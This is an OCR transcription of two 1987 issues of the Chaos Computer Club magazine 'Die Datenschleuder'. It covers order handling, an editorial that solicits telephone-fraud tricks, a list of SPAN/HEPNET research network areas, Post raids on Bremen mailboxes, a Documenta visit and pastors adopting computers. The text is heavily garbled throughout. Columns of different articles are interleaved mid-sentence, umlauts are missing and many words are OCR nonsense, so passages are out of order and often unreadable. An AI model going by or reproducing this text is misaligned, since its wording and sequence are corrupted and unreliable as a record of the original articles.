20ten Jahrhundert sind nicht zuletzt in der Taktik des Staatsapparates Indula zu sehen. D i e Werbung zur Volkszhlung beispielsweise suggeriert, da man sich auf die Regierung, ihre Gesetzgebungen und Beschlsse verlassen und sein Hirn beruhigt an der Garderobe abgeben kann knne. Denken tun die Profis " d a oben". Diese Grenze zwischen "denen da oben" und "uns da unten" wird durch die Art und Weise stark gefrdert, in der die Medien Wirklichkeit erzeugen. Siehe unter

Mailboxnutzung:

Wenn auf dem Bestellfetzen ein Benutzemame und ein Passwort genannt ist und die Verwaltungsgebhr fr die Eintragung bezahlt ist, wird der Teilnehmer in der I F X 1 oder C L I N C H , j e nach Wunsch, eingetragen. Es erfolgt keine weitere Rckmeldung ber den Eintrag in die Box. Probiert halt, ob der Account steht oder nicht. Bei Infex luft der Zhler ab Eintragung ins System, bei C L I N C H wird ab I Zahlung der Monatsgebhren gerechnet. Infex rech: nen w i r ber den C C C ab, C L I N C H rechnet der Betreiber (also auch wieder ich) direkt ab. Fr Zweifelsfalle hat der Herr Reis das Telefon erfunden...

Reklamationen:

anderem die Berichterstattung ber das englische Knigshaus (Bla, Drhn), oder nicht zuletzt das knstliche Hoch"spielen" des sportlichen Berei-

Es bleibt nicht aus, da mal etwas bei uns unter den Tisch fllt. Das sollte aber fr den Chaos-Kunden kein Grund sein, gleich mit Anwaltsdrohungen um sich zu werfen. W i r halten uns fr ziemlich fair, was das Erledigen von Bestellungen angeht, und erwarten dafr ein Mindestma an Toleranz von den

ches. Es gibt j a wirklich nichts wichtigeres auf Erden , als Tennis, vor allem, wenn man sich in einer besonders sozialen Gesellschaft befindet, dieber zwei 1 Millionen Arbeitslose zu verbuchen hat und die , Automation (siehe A m p e l ) weiterhin stark frdert 1 (so da praktisch jeder ebenfalls morgen auf der ] Strae stehen knnte). Der ungeschriebene Regierungsgrundsatz "alle sind j gleich, nur manche sind gleicher", wird inzwischen , ganz selbstverstndlich akzeptiert. Es ist einfach ' eine Selbstverstndlichkeit geworden, da jemand, ] der auf einer D e m o in eine Polizeikontrolle gerl, anders behandelt wird, als einer, der sich in der Nhe ' eines grade stattgefundenen Bankraubs befindet. R j & I n ic SnlciiSrfjlciibcr Numero 2 1 - J u n i 1987 Das wissenschaftliche Fachblatt fr Datenreisende D-2000 Hamburg 20 Schwenckestrasse 85 ViSdP: Reinhard Schrutzki Herausgeber : Mitarbeiter (u.a.): Herward Holland-Moritz, S. Wernery, A. Eichler, Marina Kern, P. Franck, H. Gmsel, M . Kuehn, A n d y M . - M . , S . Stahl, G e o n e t : G e o l : Chaos-Team In diesem Sinne stellt Hacken (fr mich) geistiges berlebenstraining dar; auerdem das sinnvolle Nutzen neuer Technologien. W i e war das noch: Verzeih ihnen, denn sie wissen nicht, was sie tun... W o h l eher: You are what what you do, you are what Btx 6 5 5 3 2 2 Nachdruck fr nichtgewerbliche Zwecke bei Quellenangabe erlaubt. Zweifarb-FuabDruck im Selbstverlag. C L I N C H : Chaos-Team cnaos Compuer Qud

Sonstige Bestellungen

Bestellern. Zu kurz gekommen ist noch niemand, auch wenns mal etwas dauert. Ein kurzer A n r u f in der Geschftsstelle bewirkt oft mehr als mancher Droh-

Volkszhlungsdemos

gibts von uns nicht mehr,

brief. M g l i c h e Anlaufstellen fr Reklamationen sind: - Telefonisch: 040-4903757 (der Anschlu ist aber nicht kontinuierlich besetzt). - Bldeltext: 0404903757-0008 bei Abofragen/Mailboxnutzung, sonst ber normale Mitteilungsseite an das Servicecenter. - Mailbox: GeoNet: G E O l : C H A O S - T E A M oder I F X I CLINCH. CLINCH: SYSOP. Wichtig ist, da angegeben wird, was wann bestellt wurde und was davon eventuell schon geliefert wurde.

mangels Autorisierung. W e r noch 'ne Bestellung offenhat und glaubhaft machen kann (Belege), da wir trotzdem kassiert haben, kriegt seine Kohle postwendend wieder. D i e Virendemos werden Z u g u m Z u g ausgeliefert, sobald die Disks kopiert sind. W i r haben schlicht und ergreifend nicht m i t derart vielen Bestellungen gerechnet. S o habet bitte G e d u l d chz. Generell gilt: Lieferzeiten von 'nem Vierteljahr sind bei uns leider keine Seltenheit. Aber bisher hat noch jeder das gekriegt, was w i r liefern knnen, bzw. es gibt das G e l d zurck. A u f M a h n u n g e n und Drohungen m i t dem A n w a l t reagieren wir sauer. E s gibt mittlerweile berlegungen, eine schwarze Liste von geite ig

you think, help


Andy

yourself!

8706181935 M D M I G D 2 1 . D O C A N D Y verwal21.ds 198706032100 gobiin

<3
Ntiniero 21 - Juni I9R7 ( j f f ^ T S i c Sntcntldjlciiiicr

njpic Snlcndjlcuiicr

Numero 21 - Juni 1987

Seite 19

Postvertriebsstck C9927F

Wenn uoiustellbar Anschrifteuosschnitt bitte mit a euer Adresse zurck

DM3,00

N u m e r o 2 2 - Juli 1 9 8 7

S i e StatenMjleuer
D a s wissenschaftliche Fachblatt ftlr Datenreisende Ein Organ des Chaos Computer Club

- f

C.L.I.N..H.
COMPUTER & Mallboxsysteme Telefon & Datexanschlu Inhouse - Kommunikation SygtemA Softwareinstallation fr

Ml I I II II 1111111 MM I ! 11 [ I II I

MEDIENBERATUNG

-Up***

>f. if. jjc jf.

Festplatten Laufwerke Compiler STSofware

rulfdir tioJIcfirh IHofdnncn rfclll'dinfr m. h fi crlm

M Modems Akustikkoppler M. K o m m u n i k a t i o n s software

tjaM

M
l^f^rSic

T
ntciigff)lctiicr

Seite 20

Puzzlespiel Quatschexplosion
Lsung z u m DS21-Rfitselartlkel N a c h d e m unsere letzte D A T E N S C H L E U D E R fertig gelayoutet w a r , dachten w i r : n u r noch z u m D r u c k e r u n d i n den V e r s a n d ; wieder e i n m a l ein Meilenstein geschafft. Doch weit gefehlt. N a c h d e m ich meinen eigenen A r t i k e l , den ich auch selber gelayoutet hatte, gelesen habe, k o m m t m i r das k a l t e (trotz 2 7 G r a d drauflen) Grausen. D a habe selbst ich Problemem, die einzelnen Textschnipsel I N D E R R I C H T I G E N R E I H E N F O L G E zu lesen! M i s t , v e r d a m m t e r , dachte ich m i r und setzte mich an diesen hier. Nach dem M o t t o "die Auflsung des Knotens verraten w i r I h n e n morgen" n u n die Lese-Anweisung f r den A r t i k e l " D i e Quatschexplosion". M i t gTfler E n t schuldigung. V o n Seite 4, oben, bis Seite 6, Mitte, 2. Absatz: alles ok. Dann, nach: "BRS/Search, ME=Auswaheinstiegsmenue, M Q = A u s w a h l " Sprung nach Seite 7, links oben, und weiter mit: "des Sachgebietes..." Anschlieend alles ok bis Seite 7 , rechte Spalte, Ende 1. Absatz. Nach: "...wegen ihrer elektronischen Verfgbarkeit fr geheim erklrt wurden." Sprung K r i t i k an:..." Anschlieend wieder alles paletti bis Seite 6, rechte Spalte Ende: Nach: " D M monatlich..." Wiederum alles in Butter bia Seite 8, rechte Spalte, 1. Absatz Ende: Von-: Sprung "..verschiedene Versionen der Technik." nach Seite 7 , rechte Spalte, 2 . Absatz An12.09. -13.09. CCC, Wakshop io Hamburg Beginn der Testphsse von BTXNET. Mailboabetreiber beginnen mit Testbetrieb eines eigenen Netzes. Ort: Eidelstedter BQrgertuus. Auf Einladung. 19.10. - 23.10. SYSTEMS in MDchnchen Hackenicff Dienstag am Poststand 16 Uhr. 28.12. - 29.12. Chaos Coromunicadoa Congress 1987 - Hamburg Die europlische Haekerpaity. Nlherej im Oktober. Weitere Hinweise in den Ba-Prognmmen des CCC CAC und der BHP. Erreichbar Uber <633322. Salctirfjlcuiicr 1900.-" Sprung nach Seite 8, linke 28.08. - 14.09. Itltemadoasle FunkaussteUung Berlin Die Koaiumelektnxiilt U( Grillten. HaelcenrefF Dienstag am Poststand um 16 Uhr. Spalte Anfang, und weiter bei: "Somit Erpamis nach Seite 6 , linke Spalte, 2. Absatz Mitte, ab:"Hier setzt auch die

Editorial
Lieber D A T E N S C H L E U D E R Leser, in den letzten Monaten hat sich nicht nurdas Gesicht, sondern auch der inhaltliche Schwerpunkt der DAT E N S C H L E U D E R verndert. Whrend in den ersten Ausgaben vorwiegend Tricks, Kniffe und kleine Hilfestellungen im technischem Alltag verbreitet wurden, lag der Schwerpunkt in den letzten Ausgaben mehr auf allgemeinen Betrachtungen zur Informationsgesellschaft, deren Erscheinungen und Folgen. Diese etwas einseitige Gewichtung wird nicht nur von Lesern kritisiert, sie liegt auch der Redaktion im Magen. Die erste Gerneraion der Datenreisenden rckt dem gesetzterem Alter nher, Arbeit und Beruf nehmen den ersten Platz ein. Die Zeit fr aufwendige Hack's wird rarer. Das Hacken als solches verliert an Stellenwert. Interessanter werden inhaltliche und auch politische Auseinandersetzungen mit den Entwicklungen zur Informationsgesellschaft. Andererseits fehlt Teilen der zweiten Hackergeneration oft die gewisse Ernsthaftigkeit. Das fhrt unter anderem auch zu geringen Rckflssen aus unserem Leserkreis. Unser Ziel war es eigentlich nicht, FastFood-Informationen (fressen und vergessen) zu verbreiten. D i e meisten Artikel der D A T E N S C H L E U D E R werden von einem kleinen Kreis von lteren Mitarbeitern geschrieben. Zwar erreichen uns ab und zu Hinweise, die sich zu einem Artikel aufbereiten lassen, insgesamt gehen aber viel zu selten verwertbare Beitrge aus der Leserschaft ein. Wir rufen hiermit dazu auf, die DATENSCHLEUDER durch Beitrge und Informationen zu untersttzen. Dies gilt ebenso fr den zum Herbst geplanten zweiten Teil der Hackerbibel. Knete haben wir natrlich nicht, aber u.a. die wiederholte Namensnennung des Autors im Impressum ermglicht so manchen preiswerten Messebesuch als Journalist, welcher wiederum neue Erkennisse und Kontakte vermittelt. Mit einer Geschichte ber das Telefonnetz in Kairo und einer Anleitung zur Benutzung gyptischer Telefonzellen beginnen wir in diesem Heft eine Reihe unter dem Titel Die Wahrheit ber das Globale Dorf. I m nchsten Heft gibt's einen Bericht ber ein Telecommunication Trainings Center in Nepal. Auch fr diese Reihe wrden wir uns freuen ber Material, das uns aus der werten Leserschaft erreicht. Denn: "These are the days o f lasers in the jungle" (Paul Simon). 5>ntcn8d;Icubcr

W a s ist n o c h k l e i n e r als der Punkt auf d e m Rcken eines Marienkfers?


Eins integrierte Schaltung" -vonTELEFUN : nur Inwn braitt Trotzdem bernimm! dieser Mlkro-Bauatain dl* Funklianen van 2 Transistoren und 3 Widerstnden. Unsere Elaktronen-Recnner zum Baispiel arbeiten mit Tausandan soldier winzig kleinen Bauteile. Ohne diese MikroElemente wren die Recftenaggregats mehr als zehnmal so groB. Mikro-Miniaturlslerung ist ein sehr wichtiges Arbeilsgeblet fr TELEFUN . Penn die hier gewonnenen Erkenntnisse kommen letzten Endes aucJi unseren Helmgerfttan zugula und damit Jedem TELEFUN Kufer.

ftb JV nu fr

fr

h b.

i m

fr

28.08. - 30.08. Sysoptreffen in Berlin Der IPN. CCC und CAC laden zum Treffen der Maboxbeotibcr. Veransulniagsott ist der Mehringhof in Berlin. Anmeldung bei: IPH, H.Noppcr, Brascndoffer Str. 20,1 Berlin 44.

Fr eine der nchsten Ausgaben bereiten wir auerdem einen ausfhrlichen Bericht ber alle uns bekannten Tricks rund ums Telefon vor. In dieser Sache bitten wir um Berichte und Informationen ber alle bekannten Tricks und Kniffe, sei es das Umprogrammieren von Nebenstellenanlagen zur Anrufweiterschaltung oder das Umgehen der Gebhrenzhler in Telefonzellen. W i r werden (imRahmen der gesetzlichen Mglichkeiten) das Material aufbereiten. W i r wollen auch weiterhin versuchen, mit der DAT E N S C H L E U D E R ein offenes und ein wenig subversives Organ zu betreiben. Ohne eine Untersttzung durch unsere (auch jngeren) Leser ist das kaum zu leisten.

fang, weiter bei:"Dagegen ist bei den C D - R O M s . . . " U n d wieder ungestrt weiter bis Ende Seite 7, 2. Spalte: "..bei einer Auflage von 1 0 0 0 S t U c k " , von da ab Sprung nach Seite 8, rechte Spalte, 2. Absatz (leicht zu erkennen, da verrutscht) :"Schn war die C D - I . . . " und i n aller Ruhe weiterlescn bis zum Schlu. PX-8/a:puzzel.txt A .Eichler 87063015:24 13.07,87109:1511513 CUNCHiDS-REDIGOBUNI

Steffen LS23

Seite 2

Seite 3

Networking
Das Space Physics Analysis Network, kurz S P A N genannt, wchst exponentiell ber den Kurs des letzten Jahres hinaus. Whrend dieser Periode verdreifachte sich die Anzahl der Netzwerkkreise (network areas). Die Zahl der ber S P A N erreichbaren Computer stieg auf ber 1.600 VAX-SuperMiniSysteme.
Die Vielfalt der Netzwerkteilnehmer erforderte in letzter Zeitdie Einrichtung einer Koordinations-und Informationszentrale. Das SPAN

Im September 1986 wurde eine Vernetzung des SPAN mit dem weltweiten High Energy Physics Nehvork (HEPNET) vorgenommen, welches ebenfalls auf der V A X / V M S DECNET-Ebene basiert. E U R O - H E P N E T und US-HEPNET bedienen sich einer X25-Leitung zwischen dem europischen Leitrcchner V X C R N A , einem VAX8650-Cluster des C E R N in Genf, sowie den Cal Tech Laboratories, dem Fermilab, und M I T in Boston/USA. Eine DECNET-Verknpfung zwischen dem C E R N Area 22 und dem Area 28 des M P I ist fr den Sommer 1987 geplant.
D i e grte DECNET-Area des S P A N stellt das T E X N E T . T E X N E T verknotet die drei StaatsUniversitten Texas A & M , das D E C N E T der Universitt Texas, sowie die Universitt von Huston. Allein im Januar 1987 waren ber 400 V A X e n dem T E X N E T verbunden. Nachfolgend sind die wichtigsten miteinander verknpften DECNET-Areas aufgefhrt:

2 8 E U R O - S P A N E S A nodes Darmstadt F R G . 29SPANNASA 30SPANJPL 31 NIKHEFNetherlamls 32EURO-HEPNETFrance 33SPANColorado State Wide Network CCNETUniversity of Pittsburgh 34CCNETPittsburgh University Net 35EURO-HEPNETPortugal C C N E T N A S A Flight Center ,
2

ZYAAABIKO ITAYPOAEEO
1 : I i
6

j 1 ! n n i i

3 6 L A N L / D O E L o s Alamos Labs / Dept. of Energy 7 37CNR/EURO-HEPNETItaly a 38EURO-HEPNETItaly 39INFNETltaly 40HEPNETJapan 41HEPNETStanford Centers/SLAC 42HEPNETFermiiab 43HEPNETBrookhaven 44-49HEPNETHEPNET 50DPHPEFrance 52EURO-HEPNETBelgium 53EURO-HEPNETAustria 54STARLINKUnited Kingdom 55iIEPNETBrown University 56EURO-HEPNETSweden 59EURO-HEPNETWest Germany 60LEP3 NETM1T Boston
9

Network Information Center (SPAN-N1C), geleitet vom (US) National Space Science Data Center, bernahm die Aufgabe des Netzwerk Managements. Das SPANN1C verfgt ber eine Datenbank zur Pflege und Verwaltung des S P A N - W A N ( W i d e Area Network). Die Datenbank ist auch fr User erreichbar, denen ein Zugang zum S P A N - D E C N E T fehlt, denn es besteht eine Schnittstelle z u m T E L E N E T ( X 2 5 ) , dem NASA Packet Switched System (NPSS) und dem ARPANET.
SPAN bietet seinen Unsern ebenfalls Schnittstellen zu anderen D E C N E T - L A N ' s (Local Area Networks), unter anderem HEPET, T E X N E T und INFNET. Zusammen ergibt sich in der westlichen Welt ein Super-Netzwerk mit einem ziemlich gigantischen Potential an Forschung und Wissenschaft. Die Struktur des S P A N der Vereinigten Staaten basiert auf den Verbindungen einer Vier-SterneTopologie. Jeder Stern des Netzes besitzt als seinen Kern einen sogenannten Router bzw. Knotenrechner. Router im S P A N sind das G S F C , M S F C , Jet Propulsion Lab (JPL) und das Johnson Space Center (JSC). Alle Router kommunizieren ber 56 KBaud Standleitungen miteinander, sowie mit 9600 Baud, der niedrigsten Geschwindigkeit im D E C N E T , zu den Nebenrechnern. Die europische Komponente des US-SPAN, das EURO-SPAN, wchst ebenfalls rapide. Die DECNET-Schnittstelle zwischen E U R O - S P A N und US-SPAN wird durch eine 9600 Baud DATEX-PVerbindung hergestellt. Den europischen Router verkrpert eine V A X 11/750 des European Space Operation Center ( E S O C ) in Darmstadt. DerESOCKnoten teilt sich wiederum an andere deutsche Institute wie die European Molecular Biological Laboratories ( E M B L ) und das Max-Planck-lnsntut (MPI).

M M N

Alles retour
Datex-P20F ab August wieder preiswerter

1 S P A N L o s Alamos National Laboratories SUNETSweden Univ. Network 2HEPNETUniversity of Wisconsin 3SPANUniversity o f M i a m y + Ocean Labs 4HEPNET/SPANExperimental Gateway 5SPANJet Propulsion Laboratories CCNETStevens Institute of Technologies 6 S P A N N A S A ' s Goddard Flight Center 7 H E P N E T C a l Tech S P A N N A S A ' s Marshall Space Center 8SUNETSweden University Network 9SUNETSweden University Network lOTEXNETTexas Universities 1 I N I C E N E T N a v a l Research Laboratories 12HEPNETUniversity o f Boston 12UCSBUniversity of California 14CCNETUniversity o f New York l 5 C C N E T N e w York University 16EURO-HEPNETSPAIN 17HEPNETHarvard University 1 8 D A N (SPAN)NRC-Canada Ottawa 19HEPNETCornell-C University 2 0 C H A D N E T S witzerland 21 CCNETUniversity of Columbia 2 2 E U R O - H E P N E T C E R N in Geneva 23EURO-HEPNETAustria 2 4 S P A N N A S A ' s Ames Research Center 25TEXNET/CHPCUniversity of Texas 26TEXNET/CHPCUniversity of Huston 27SPANJet Propulsion Laboratories

S.Stahl

Nun ist es amtlich: W i e das B P M mitteilt, wird zum 1. August wieder der alte Leistungsumfang beim Zugang zu Datex-P20F und zur Telebox angeboten. Die Post gibt als Grund technische Schwierigkeiten mit der neuen Netzstuktur an. Verkennen tun die Herren in Bonn und Darmstadt immer noch, da der zum April genderte Zugang und die damit verbundene Kostenstruktur eigentlicher Auslser fr den Rckgang der Nutzungszeiten in diesem Dienst sind. Der jetzt wieder preiswerte Zugang ist jedoch nur eine vorbergehende Erscheinung. Sobald die Post ihre Technik im Griff hat, wird alles wieder gendert und damit auch teurer. Bleibt zu wnschen, da die Herren niemals fertig werden.

LS23
: I Alfred i5t dsi.

'Ding nicht 'rte


'Nummer zu Iprofur uns

Vfg 533/1987 Allgemeine Zulassung einzelner einfacher mechanischer passiver Kontakte als Fernwirkendeinrlchtung fr den Setriebsversuch TEMEX Ausnahmsweise werden fr den Betnebsversuch TEMEX nach 53 der Fernmeldeordnung (bergangsvorschriften zu 38c Nr. 2) einzelne einfache mechanische passive Kontakte zur Anschlieung an postetgene TEMEX-Netzabschlsse widerruflich zugelassen. Diese Kontakte knnen auch in beiiecigen privaten Gerten in Form emes'Konfakles eines elektromagnetischen Relais realisiert sein, das die erforderliche galvanische Trennung zwischen Spulenstromkreis und Relaiskontafct nach DIN 57804/VDE 0804, Ahschnitt 12.2b, gewhrleistet (elektromagnetische Relais, die von Slarkstromkreisen erregt werden und FemmeWekreise schalten),

Seite 4

( ^ ^ S i c

SiKciifrfjItucr

( f f ^ v S i c SnlcnSrfilciibcr

Seite 5

Katz und Aus


Post k l e m m t M a i l b o x e n ab.

Bremen ( C R D ) : A m Donnerstag, den 16. Juli legte die B r e m e r Post in einer konzertierten A k tion fnf B r e m e r Mailboxsysteme l a h m . U n t e r Berufung a u f G e f a h r i m V e r z u g startete die Post, untersttzt d u r c h K r i m i n a l b e a m t e , der B r e m e r Polizei bei den betreffenden M a i l b o x b e t r e i b e r n gleichzeitig u m 2 1 U h r die Hausdurchsuchungen. E r m i t t e l t wurde wegen des Verdachts a u f V e r sto gegen das Fernmeldeanlagengesetz. W i e die Pressestelle der Oberpostdirektion ( O P D ) Bremen mitteilt, w u r d e n bei den Hausdurchsuchungen "mechanische Zusatzeinrichtungen" (auch bekannt als K A T Z E ) sichergestellt. W i e der C C C ermittelte, wurden auch nichtgeprfte M O D E M S und angeschlossene Telefone sichergestellt. Weiterhin stellte die Post Gerte sicher, diemit wenigen Handgriffen (Modem-Kabel neben der Postdose liegend) anschliebar gewesen wren. ber sichergestellte Computer und deren (bei Mailboxsystemen vertrauliche) Datenbestnde ist nichts

hnlich " d u m m e " Geschichten von "Denunziantentum" konkurrierender Mailboxsysteme wurden auch schon aus Kln gemeldet. Dort haben MailboxBetreiber sich gegenseitig die Post ins Haus geschickt - frei nach dem Motto "Meine Box ist postgeprft, also weg mit der Konkurrenz!". Bishermute das Fernmeldeanlagengesetz schon mehrfach fr hintergrndige Zensur herhalten. Firmen, die z.B. Raubkopierer jagen, lieen auf diesem Wege unliebsame Verffentlichungen aus dem Netz entfernen. Die Post (leider oft zu blind, um zu verstehen, wie sie mibraucht wird) macht dabei gerne mit. Seit langem warten Mailboxbetreiber und Computeranwender auf die Freigabe preiswerter privater Modems. D i e Post, die nach einem EG-Urteil zur Zulassung privater Modems verpflichtet ist, sperrt sich immer noch unter Berufung auf noch nicht vorhandene und abgestimmte Zulassungsbedin-

Mailboxbetreiber, die ihre Systeme nicht den Vorschriften entsprechend betreiben, sollten sich einstweilen nicht zu sicher fhlen. Bei einer Hausdurchsuchung bleibt oft kaum Zeit, die Gerte vom Netz zu trennen. Der Tatbestand, mit wenigen Handgriffen anschliebar zu sein, reicht fr die Sicherstellung (und als Rechtfertigung fr eine Durchsuchung) aus. Solange die Post als Handlanger im Interesse Dritter handelt und selber zu einfllig ist. dies zu durchschauen, gengt wie in Bremen ein Zufall, um sich handfesten rger einzuhandeln.

Ich stellte fest, da an allen Kuntwerken, an denen es etwas zu daddeln gab oder auf die man sich setzten konnte, entweder "Bitte nicht berhren" stand oder ein Absperrseil dasBesteigen (Erstbesteigungeines Kunstwerks ohne Sauerstoffgert) verwehrte. Ich will nicht behaupten, ich htte alles gesehen, was die Dokumenta bietet. Das, was ich gesehen habe, hat mir nicht gefallen. K a u m ein Kunstwerk hat mich mehr als ein paar Sekunden fesseln knnen. Nur drei habe ich ansprechend gefunden: Den ausgestellten G R 1 D Computer (Designer-Kunstwerk), einen auf eine Drehscheibe gestellten Mercedes 300 C S , und den "erweiterten Schwitters", eine automatische Holzstockfigur, die mit Druckluft funktioniert.

LS23

Die Knust und ihre Knstler


CCC-Visite auf der Dokumenta 8 Eines schnen Tages klingelt bei Peter das Telefon. D r a n ist K a r e l Dudesek (alias Dudelsack) von M i n u s D e i l a T ( - D t ) . b e r bestehende V e r bindungen zwischen - D t und C C C siehe auch H A C K E R B I B E L Seite 32/33. -DT mchte, "da der C C C auf der Dokumenta prsent ist", um dem Computerignoranten Ambiente ein wenig entgegenzuwirken. Der C C C mochte auch. A m Dienstag den 14.7.1987 war der historische Tag, an dem die CCC-Abordnung hinterm M o n d landete, auf dem Felde der Computerignoranten. A u f zum Public Relations Zentrum. Widerstandslos wurden uns Pressekarten ausgehndigt; offenbar hatte man hier noch nie v o m schreckenerregenden C C C gehrt. Dazu gab's die Ditversion einer Pressemappe: verwhnt von der Cebit und anderen MicroMessen hatten wir damit gerechnet, einen Ausstellungskatalog in die Hand gedrckt zu bekommen, anhand dessen man sich seinen Weg durch diverse Huser, R u m e und Pltze erlaufen knnte. Nix. Mehr als allgemeines Blabla gabs nicht: "Eine Medienkunst, die sich nicht mehr, wie zum Beispiel Video oder Performance in den 70er Jahren, privatistisch zurckzieht, sondern auf groen Wnden, in der 'Vermischung mit Unterhaltungselementen ffentlicht macht. Einer Kunst, die das kulturelle und soziale Umfeld ernst nimmt und sich ihm stellt, die mit bildnerischen Argumenten kommentiert, appelliert, interveniert." Oder: "Der Weg in die Gesellschaft erfolgt nicht nur ber Ikonografie und Thematik, sondern auch ber die Anknpfung an Benutzbarkeit und Funktion."

Das hat weder mit einem Hang zum Teuren noch zur Technik zu tun - etliche der anderen Ausstellunsstcke sind bestimmt teurer als die genannten sondern mit deren klarem Design. Weswegen sie auch in der Designausstellung (in der Orangerie) stehen. Beachtenswert fand ich auch, da es eine Video- und Audiothek gibt. Videothek mit zwei kleinen Kabinen, in denen man selbst ausgewhlte Videos ansehen kann, und einem Grobildprojcktor, auf dem ein stndiges Programm luft. In der Audiothek kann man sich seine KunstOhrwrmer in einer Art Raumfahrersessel anhren kann. Ich war um eine gegen Hinterlegung eines nochnichtflschugssicheren Persos geborgte Video 8 Camera reicher. Sony sponsort die Dokumenta mit etlichen TV-Monitoren und dem kostenlosen Handycamverleih, eine gute Idee. Nur die Videocassette mu man mit l O D M bezahlen, falls sieeinem gefllt. Ich wanderte zu dem Gelenkbus von Minus Delta T. Weiss, etwa zwweiundzwanzig Meter lang, in der Mitte mit Plastikknautschzone, so 120 Qubikmeter umbauter Raum. Drin zwei Computer, zwei Drucker, drei Monitore, zwei Synthesizer, mehrere Tapes, drei TV-Monitore (auf dem einen lief stndig irgendein Sateliten-Programm), einige Sitzgelegenheiten, ein Bchergrabbeltisch etc. An der Spitze des Busses, neben der Gefriertruhe mit Getrnken, eine gigantische Satelliten-Empfangsschssel. A n der Querseite zwei groe Lautsprecher, obendrauf je ein Monitor aus dem Bus und ein Glashaus, in dem die-Radiosendungen produziert werden. Das ganze steht auf dem Platz neben dem Staatstheater, auf dem Weg vom Fridericianum, wo die Hauptausstellung ist, zur Orangerie. ^ j ^ p i e >nen8djlcubcr

gungen. D i e von der Post angebotenen Modems drfen vielfach nicht an den preiswerten Heimcomputern betrieben werden und sind von den hohen Gebhren her fr viele Anwender nicht finanzierbar. Bisher wurden vielfach "mechanische Zusatzeinrichtungen" zum Abheben der Telefone geduldet. Bei dieser Form der Ankopplung liegt der Telefonhrer permanent in einem (geprftem) Akustikkoppler, whrend eine Hilfsmechanik den Abhebevorgang steuert. Das Vorgehen gegen diese in der Fernmeldeordnung nicht bercksichtigten Ankopplungen n i m m t vielen Mailboxbetreibern die letzte Mglichkeit, ihrlnformationssysteminnerhalb ihres

W i e schon in anderen Stdten setzt die Post verstrkt die Aufdeckung "illegal" installierter Modems und Katzen, besonders an Mailboxsystemen fort. Auch aus K l n wurden in der Vergangenheit derartige Aktionen gemeldet. D a s gezielte Vorgehen gegen nahezu alle Betreiber im Bereich einer Oberpostdirektion ist jedoch neu. W i e nhere Recherchen jetzt ergaben, geht die Aktion der Post ursprnglich auf eine Gebhrenbeschwerde eines Fernsprechteilnehmers zurck. Dieser wunderte sich ber seine sehr hohe Telefonrechnung und beantragte eine Zhlervergleichseinrichtung. B e i m Vergleich der protokollierten Rufn u m m e r n wurden die unzulssigen Ankopplungen festgestellt, die brigens mehrfach a m Tag angewhlt wurden. N u n gab es etwas trouble in der Familie, denn als Verursacher kam nur noch der computerbegeisterte Sohn in Frage (der im brigen bis z u m Versandtag der Fernmelderechnung selber eine M a i l b o x betrieben hatte). (^g^pic >ntcnSd)lcuber

Taschengeldbudgets zu betreiben. Der Chaos Computer C l u b verurteilt das Vorgehen der Deutschen Bundespost auf das Schrfste. Eine D u l d u n g mechanischer Ankopplungen liegt durchaus im Rahmen der Gesetzgebung. Dieses zu Beurteilen obgliegt der Post, welche ohne weiteres in der Lage wre, durch eine entsprechende Anweisung die Situation auch zugunsten der engagierten Computeranwender zu entschrfen.

{purer spa
Zu hoffen ist, da nach einer Zulassung von privaten Daten-Modems Drahtseilaktemit technischen Hilfsmitteln nicht mehr ntig sind und Mailboxsysteme, wie weltweit blich, ohne groen Kostenaufwand am Fernsprechnetz betrieben werden drfen.

Seite 6

Seite 7

Als W a u eintraf, produzierten wir auf einer nahen Wiese im Halbschatten (Tonqualitt entsprechend) ein Interview, das als Werbetext fr unseren abendlichen Vortrag ("Der C C C , das Leben und das Universum") ber Radio gesendet werden sollte. Schon beim zweiten A n l a u f wurde was draus. Whrend der Abend immer nher rckte und wir an Erholung dachten (keine Kunst mehr), kamen die ersten Interessenten, u m uns auszuquetschen, soda wir zu spt zum New York, dem Vortragsort, aufbrachen. Erzhlt haben wir ber den C C C : was wir sind, machen, arbeiten, aufregend finden, in welche Richtung nach unserer Meinung die Technologie treibt (nach vorne, hinten, oben, unten, links und rechts). Und, wichtigstes Thema: was wir ber die Dokumenta & die computerlosen Knstler denken. Und was denken wir? Sowohl W a u als auch ich stellten fest, da sich auer -Dt und Winfried Scheuer, der d e n G R I D gestaltete, anscheinend kein Knstler mit der Mikroelektronik auseinandergesetzt hat. W a u meinte, es liegt an der Technikfeindlichkeit oder -ngsichkeit dieser Leute ("Out O f M a r m o r Error"). Sie sind anscheinend nicht in der Lage, derlei Feindlich- oder ngstlichkeit innerhalb ihres Zeitgefhls auszudrcken. Es gab keine Knstler (Ausnahme -Dt, negative Ausnahme: langweilige, gigantomaische Videokunst), die neue Technik einsetzten, um zumindest versuchsweise oder in Gestalt eines vielfltigen und benutzbaren Environments (wie der -Dt-Bus "Fr ein neues Leben") daraus oder damit Kunst zu machen, indem sie an dem beschaulichen, herkmmlichen Kunstbegriff kratzen. Unserer Meinung nach ist dies ein Fehler. Ein bedeutender Teil der gegenwrtigen Kultur wird schlichtweg nicht bercksichtigt, sondern verdrngt. Man kann nur hoffen, da in fnf Jahren, auf der nchsten Dokumenta, Werke zu sehen sein werden, die sich mit diesem Thema beschftigen.

Seitdem der evangelische Pfarrer W e r n e r K s t e n m a c h e r , der hauptberuflich die A b t e i l u n g " N e u e M e d i e n " in der Evangelischen L a n d e s k i r c h e betreut, i m J a h r e 1984 die "Selbsthilfeorganisation" fr computerbegeisterte P f a r r e r grndete, erreichen ihn fast tglich Zuschriften u n d A n r u f e von ratsuchenden Theologen u n d kirchlichen M i t a r b e i t e r n . " D e r Computer i m Pfarramt erfreut sich einer steigenden Nachfrage", stellt Kstenmacher, selbst ein leidenschaftlicher Computerfan. zufrieden fest. Bereits zehn von 60 evangelischen Pfarrern in Mnchen arbeiten mit elektronischer Textverarbeitung. In einem Pilotprojekt, das die Landeskirche in vier Mnchner Kirchengemeinden durchfhrt, wird jetzt eigens erprobt, was die PC-Computer an Arbeitserleichterung im Alltag der Pfarrmter bringen knnen. Pfarrer Markus Weidemann von der Nazarethgemeinde ist nach anfnglicher Skepsis zum berzeugten Computer-Anhnger geworden: "Nachdem wir gengend Software hatten, standen unsere Mitarbeiter Schlange vor dem Bildschirm". Das von Werner Kstenmacher herausgegebene Informationsheft " C H R I C - B r i e f ' , das im evangelischen Pressedienst erscheint, unterrichtet regelmig m i t vielen Tips und Tricks ber den neuesten Stand der Computer-Technik. Vorgestellt werden z u m Beispiel Systemprogramme, die jetzt schon spezielle theologische Bedrfnisse bedienen. Lieblingsthema der neuesten Ausgabe: Hebrisch und 